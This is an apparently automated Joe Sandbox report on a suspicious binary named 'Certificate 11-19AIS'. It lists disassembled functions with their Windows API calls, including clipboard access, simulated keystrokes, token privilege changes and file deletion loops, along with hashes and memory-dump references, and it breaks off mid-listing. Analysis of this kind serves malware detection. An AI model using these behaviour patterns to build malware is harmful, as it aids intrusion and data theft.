                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0081F87D
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0081F8DC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0081F919
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0081F940
                                                                              • SendMessageW.USER32 ref: 0081F966
                                                                              • _wcsncpy.LIBCMT ref: 0081F9D2
                                                                              • GetKeyState.USER32(00000011), ref: 0081F9F3
                                                                              • GetKeyState.USER32(00000009), ref: 0081FA00
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0081FA16
                                                                              • GetKeyState.USER32(00000010), ref: 0081FA20
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0081FA4F
                                                                              • SendMessageW.USER32 ref: 0081FA72
                                                                              • SendMessageW.USER32(?,00001030,?,0081E059), ref: 0081FB6F
                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0081FB85
                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0081FB96
                                                                              • SetCapture.USER32(?), ref: 0081FB9F
                                                                              • ClientToScreen.USER32(?,?), ref: 0081FC03
                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0081FC0F
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0081FC29
                                                                              • ReleaseCapture.USER32 ref: 0081FC34
                                                                              • GetCursorPos.USER32(?), ref: 0081FC69
                                                                              • ScreenToClient.USER32(?,?), ref: 0081FC76
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0081FCD8
                                                                              • SendMessageW.USER32 ref: 0081FD02
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0081FD41
                                                                              • SendMessageW.USER32 ref: 0081FD6C
                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0081FD84
                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0081FD8F
                                                                              • GetCursorPos.USER32(?), ref: 0081FDB0
                                                                              • ScreenToClient.USER32(?,?), ref: 0081FDBD
                                                                              • GetParent.USER32(?), ref: 0081FDD9
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0081FE3F
                                                                              • SendMessageW.USER32 ref: 0081FE6F
                                                                              • ClientToScreen.USER32(?,?), ref: 0081FEC5
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0081FEF1
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0081FF19
                                                                              • SendMessageW.USER32 ref: 0081FF3C
                                                                              • ClientToScreen.USER32(?,?), ref: 0081FF86
                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0081FFB6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0082004B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 2516578528-4164748364
                                                                              • Opcode ID: b736ee6f569b264165df8d53b6da330806e39fb7c62b9a537629328dd7cee2f1
                                                                              • Instruction ID: bae3dc7e1597e2ac9df6fd61bfef0988fe0a3873c49bc4b31f94e0524ec8e3ed
                                                                              • Opcode Fuzzy Hash: b736ee6f569b264165df8d53b6da330806e39fb7c62b9a537629328dd7cee2f1
                                                                              • Instruction Fuzzy Hash: A832AE74604345EFDB10CF68C888BAABBA8FF49358F140A29F659C72A2D731DC95CB51
                                                                              Function 0081AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0081B1CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: %d/%02d/%02d
                                                                              • API String ID: 3850602802-328681919
                                                                              • Opcode ID: 7ea96b4e6c3423cbcf0809e2ffb19a5c654fdb77eeda891e84f6a32975d3ed3b
                                                                              • Instruction ID: 0e9190fc925f1724f2c2c043a1c2da2507dcaf14d53e98c73d9de745e2c46219
                                                                              • Opcode Fuzzy Hash: 7ea96b4e6c3423cbcf0809e2ffb19a5c654fdb77eeda891e84f6a32975d3ed3b
                                                                              • Instruction Fuzzy Hash: BF12BDB1600248ABEB289F68DC49FEE7BB8FF85710F104519F919DB2D1EB748981CB51
                                                                              Function 007CEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 007CEB4A
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00823AEA
                                                                              • IsIconic.USER32(000000FF), ref: 00823AF3
                                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00823B00
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00823B0A
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00823B20
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00823B27
                                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00823B33
                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00823B44
                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00823B4C
                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00823B54
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00823B57
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B6C
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00823B77
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B81
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00823B86
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B8F
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00823B94
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B9E
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00823BA3
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00823BA6
                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00823BCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: 4f56ad03dd88098a9689ab6b7e4baa2a4f84ad9d4eef698f4f69f0b1be5601e1
                                                                              • Instruction ID: 1fabadac65af12bc8ba245fa61491fc924b4b8703d76be4a84101c6eda102c94
                                                                              • Opcode Fuzzy Hash: 4f56ad03dd88098a9689ab6b7e4baa2a4f84ad9d4eef698f4f69f0b1be5601e1
                                                                              • Instruction Fuzzy Hash: 2B31B4B1A403287BEB202F75AC4AF7F7E6CFB84B60F104415FA05EB1D1D6B45D41AAA0
                                                                              Function 007EACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                                                • Part of subcall function 007EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                                                • Part of subcall function 007EB134: GetLastError.KERNEL32 ref: 007EB1BA
                                                                              • _memset.LIBCMT ref: 007EAD08
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007EAD5A
                                                                              • CloseHandle.KERNEL32(?), ref: 007EAD6B
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007EAD82
                                                                              • GetProcessWindowStation.USER32 ref: 007EAD9B
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 007EADA5
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007EADBF
                                                                                • Part of subcall function 007EAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007EACC0), ref: 007EAB99
                                                                                • Part of subcall function 007EAB84: CloseHandle.KERNEL32(?,?,007EACC0), ref: 007EABAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2063423040-1027155976
                                                                              • Opcode ID: db6069e9f2fa650b0334326ae19ce935543bfa595af08433ca691d0f2913e326
                                                                              • Instruction ID: 635e213e6663234c848f59b58428df92910ba6b3a2582f172e5a64bf1853e38d
                                                                              • Opcode Fuzzy Hash: db6069e9f2fa650b0334326ae19ce935543bfa595af08433ca691d0f2913e326
                                                                              • Instruction Fuzzy Hash: 3381ACB1902289FFDF119FA5DC4AAEE7B78FF08304F048119F824A6161E7399E54DB61
                                                                              Function 007F60DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
                                                                                • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007F5FA6,?), ref: 007F6EF1
                                                                                • Part of subcall function 007F725E: __wsplitpath.LIBCMT ref: 007F727B
                                                                                • Part of subcall function 007F725E: __wsplitpath.LIBCMT ref: 007F728E
                                                                                • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
                                                                              • _wcscat.LIBCMT ref: 007F6149
                                                                              • _wcscat.LIBCMT ref: 007F6167
                                                                              • __wsplitpath.LIBCMT ref: 007F618E
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007F61A4
                                                                              • _wcscpy.LIBCMT ref: 007F6209
                                                                              • _wcscat.LIBCMT ref: 007F621C
                                                                              • _wcscat.LIBCMT ref: 007F622F
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 007F625D
                                                                              • DeleteFileW.KERNEL32(?), ref: 007F626E
                                                                              • MoveFileW.KERNEL32(?,?), ref: 007F6289
                                                                              • MoveFileW.KERNEL32(?,?), ref: 007F6298
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 007F62AD
                                                                              • DeleteFileW.KERNEL32(?), ref: 007F62BE
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F62E1
                                                                              • FindClose.KERNEL32(00000000), ref: 007F62FD
                                                                              • FindClose.KERNEL32(00000000), ref: 007F630B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                              • String ID: \*.*$p1ou`Kpu
                                                                              • API String ID: 1917200108-531078103
                                                                              • Opcode ID: a61733ba678fe4cfaffd5b3788bee1b9c1f824b23b88285726fcf2260c4d3885
                                                                              • Instruction ID: e7f3eb367834a6ca621a631a357f1b63a7ed5c9b47b60bce95ee39abce4f115f
                                                                              • Opcode Fuzzy Hash: a61733ba678fe4cfaffd5b3788bee1b9c1f824b23b88285726fcf2260c4d3885
                                                                              • Instruction Fuzzy Hash: F451007290821CAACB21EBA5DC48DEF77BCBF05310F0505E6E645E3241DB7A97498FA4
                                                                              Function 00806B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenClipboard.USER32(0084DC00), ref: 00806B36
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00806B44
                                                                              • GetClipboardData.USER32(0000000D), ref: 00806B4C
                                                                              • CloseClipboard.USER32 ref: 00806B58
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00806B74
                                                                              • CloseClipboard.USER32 ref: 00806B7E
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00806B93
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00806BA0
                                                                              • GetClipboardData.USER32(00000001), ref: 00806BA8
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00806BB5
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00806BE9
                                                                              • CloseClipboard.USER32 ref: 00806CF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                              • String ID:
                                                                              • API String ID: 3222323430-0
                                                                              • Opcode ID: 091cccf9ba11b5b0bf657491f0f9122fab6f6282cdcd85c8ceda964cd6481617
                                                                              • Instruction ID: 6eae796eef8932a6eecc513d12d190a924a1d59d3572a308994daf32f9ec380b
                                                                              • Opcode Fuzzy Hash: 091cccf9ba11b5b0bf657491f0f9122fab6f6282cdcd85c8ceda964cd6481617
                                                                              • Instruction Fuzzy Hash: 7E51B071200305ABD311AF64DD5AFAF77A8FF94B10F004429F666D71E1EF74E8158A62
                                                                              Function 007FF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007FF62B
                                                                              • FindClose.KERNEL32(00000000), ref: 007FF67F
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007FF6A4
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007FF6BB
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 007FF6E2
                                                                              • __swprintf.LIBCMT ref: 007FF72E
                                                                              • __swprintf.LIBCMT ref: 007FF767
                                                                              • __swprintf.LIBCMT ref: 007FF7BB
                                                                                • Part of subcall function 007D172B: __woutput_l.LIBCMT ref: 007D1784
                                                                              • __swprintf.LIBCMT ref: 007FF809
                                                                              • __swprintf.LIBCMT ref: 007FF858
                                                                              • __swprintf.LIBCMT ref: 007FF8A7
                                                                              • __swprintf.LIBCMT ref: 007FF8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 835046349-2428617273
                                                                              • Opcode ID: f4b1d1c1c86704a3b2364b3dae5097bae81237bce995fdd8179118c2c23ecd4f
                                                                              • Instruction ID: 7a546bd897b5b9d8de3a58b8f2509f30259d8fe34eebfba6ab87c5b3d9c9d798
                                                                              • Opcode Fuzzy Hash: f4b1d1c1c86704a3b2364b3dae5097bae81237bce995fdd8179118c2c23ecd4f
                                                                              • Instruction Fuzzy Hash: 36A1F0B2508344EBC311EB94C889EAFB7ECBF94704F44491EF695C2252EB38D949C762
                                                                              Function 00801B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00801B50
                                                                              • _wcscmp.LIBCMT ref: 00801B65
                                                                              • _wcscmp.LIBCMT ref: 00801B7C
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00801B8E
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00801BA8
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00801BC0
                                                                              • FindClose.KERNEL32(00000000), ref: 00801BCB
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00801BE7
                                                                              • _wcscmp.LIBCMT ref: 00801C0E
                                                                              • _wcscmp.LIBCMT ref: 00801C25
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00801C37
                                                                              • SetCurrentDirectoryW.KERNEL32(008639FC), ref: 00801C55
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00801C5F
                                                                              • FindClose.KERNEL32(00000000), ref: 00801C6C
                                                                              • FindClose.KERNEL32(00000000), ref: 00801C7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1803514871-438819550
                                                                              • Opcode ID: 28797e7b35262eb3aeac81adb0774d04e2219b89cd2f77f0d6618e963fc6d748
                                                                              • Instruction ID: 62e7e5ee2a25533d0fe2c7e8aa04ee1fb92f073d6c7b5324262fed60284f64ec
                                                                              • Opcode Fuzzy Hash: 28797e7b35262eb3aeac81adb0774d04e2219b89cd2f77f0d6618e963fc6d748
                                                                              • Instruction Fuzzy Hash: A131A032A00319ABDF50ABB0EC4DADE77ACFF45334F104596E911E31D0EB78DA858A64
                                                                              Function 00801C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00801CAB
                                                                              • _wcscmp.LIBCMT ref: 00801CC0
                                                                              • _wcscmp.LIBCMT ref: 00801CD7
                                                                                • Part of subcall function 007F6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007F6BEF
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00801D06
                                                                              • FindClose.KERNEL32(00000000), ref: 00801D11
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00801D2D
                                                                              • _wcscmp.LIBCMT ref: 00801D54
                                                                              • _wcscmp.LIBCMT ref: 00801D6B
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00801D7D
                                                                              • SetCurrentDirectoryW.KERNEL32(008639FC), ref: 00801D9B
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00801DA5
                                                                              • FindClose.KERNEL32(00000000), ref: 00801DB2
                                                                              • FindClose.KERNEL32(00000000), ref: 00801DC2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 1824444939-438819550
                                                                              • Opcode ID: ee665d90c5cb516de13abaa86a9cc0dd32f501b81579317a3a9880d0cc8f37fe
                                                                              • Instruction ID: 2c942a77dc0f8427409f3d2b0c3570500b9743d2633816507b5a9a38bf14d7aa
                                                                              • Opcode Fuzzy Hash: ee665d90c5cb516de13abaa86a9cc0dd32f501b81579317a3a9880d0cc8f37fe
                                                                              • Instruction Fuzzy Hash: 8531C132A0061ABBDF50ABA0EC4DADE77ADFF45334F104956EC11E31D0DB78DA458A64
                                                                              Function 007B7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                              • API String ID: 2102423945-2023335898
                                                                              • Opcode ID: 1fc50c03b0f70e309679416f1c9c2227690770510fc9cc9f2119e276ebbee21f
                                                                              • Instruction ID: 06744ad0a1a6c5108b9a4ea57fa731842388e1a2c8547ec8f073b19bffe0f631
                                                                              • Opcode Fuzzy Hash: 1fc50c03b0f70e309679416f1c9c2227690770510fc9cc9f2119e276ebbee21f
                                                                              • Instruction Fuzzy Hash: 49829071D04229DBCF28CF98C8807EDBBB1FF84314F25816AD955AB251E7789E85CB90
                                                                              Function 0080091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 008009DF
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 008009EF
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008009FB
                                                                              • __wsplitpath.LIBCMT ref: 00800A59
                                                                              • _wcscat.LIBCMT ref: 00800A71
                                                                              • _wcscat.LIBCMT ref: 00800A83
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00800A98
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00800AAC
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00800ADE
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00800AFF
                                                                              • _wcscpy.LIBCMT ref: 00800B0B
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00800B4A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
